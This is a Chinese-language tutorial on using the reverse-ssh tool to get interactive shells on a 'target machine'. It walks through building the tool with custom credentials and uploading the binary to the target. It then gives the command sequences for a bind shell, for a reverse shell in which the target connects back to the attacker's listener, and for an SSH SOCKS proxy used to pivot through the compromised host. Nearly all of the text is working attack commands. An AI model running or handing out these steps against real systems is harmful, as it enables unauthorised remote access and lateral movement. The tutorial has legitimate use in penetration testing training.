论如何优雅地弹Shell
前言
最近PGR酱的刷GitHub
的时候无意间看到一个工具–reverse-ssh
看了一眼README就瞬间爱上了它,因为它生成的shell能够实现用ssh连接
于是乎,很多因为不是TTY
Shell儿产生的奇怪问题就能解决
工具的安装与使用
既然是我们是做安全的,我们应该对于工具使用中可能出现的安全隐患留心些= =
所以我在本篇教程中会把工具的默认用户名+密码改掉.qwq.
在攻击机器上编译reverse-ssh
为什么要先编译?
—为了能够防止其他人偷家,我们需要自定义连接用户名密码
#先clone
git clone https://github.com/Fahrj/reverse-ssh.git
# 设置一些环境变量
#选喜欢的shell
export RS_SHELL="/bin/bash"
#设置用户名
export LUSER="root"
#设置密码
export RS_PASS="nanonanoda"
#编译
make
之后将reverse-ssh/bin
下对应文件上传至目标机器即可
Get正向Shell
目标机器上
./reverse-sshx64 -v -l -p 设置一个端口
攻击者机器上
ssh 编译时设置的用户名@目标ip -p 之前设置的端口
Get反向Shell
Step1: 在攻击机器上起监听
#攻击机器上运行
./reverse-ssh -v -l -p 监听端口
Step2:让目标来连接
#目标机器上运行
./reverse-ssh -v -l -p 攻击机器监听的端口 -b ssh服务在攻击机器上启动的端口
Step3:享受你的ssh连接吧.qwq.
#攻击机器上运行
ssh -p step2中-b参数后面的参数 编译时设置的用户名@127.0.0.1
#密码也是编译时设置的
补充:让Shell变成SOCKS代理
如果想让你的shell成为一个SOCKS代理的话,在攻击机器上运行
ssh -4 -p Shell的端口 -D 代理的端口 编译时设置的用户名@目标ip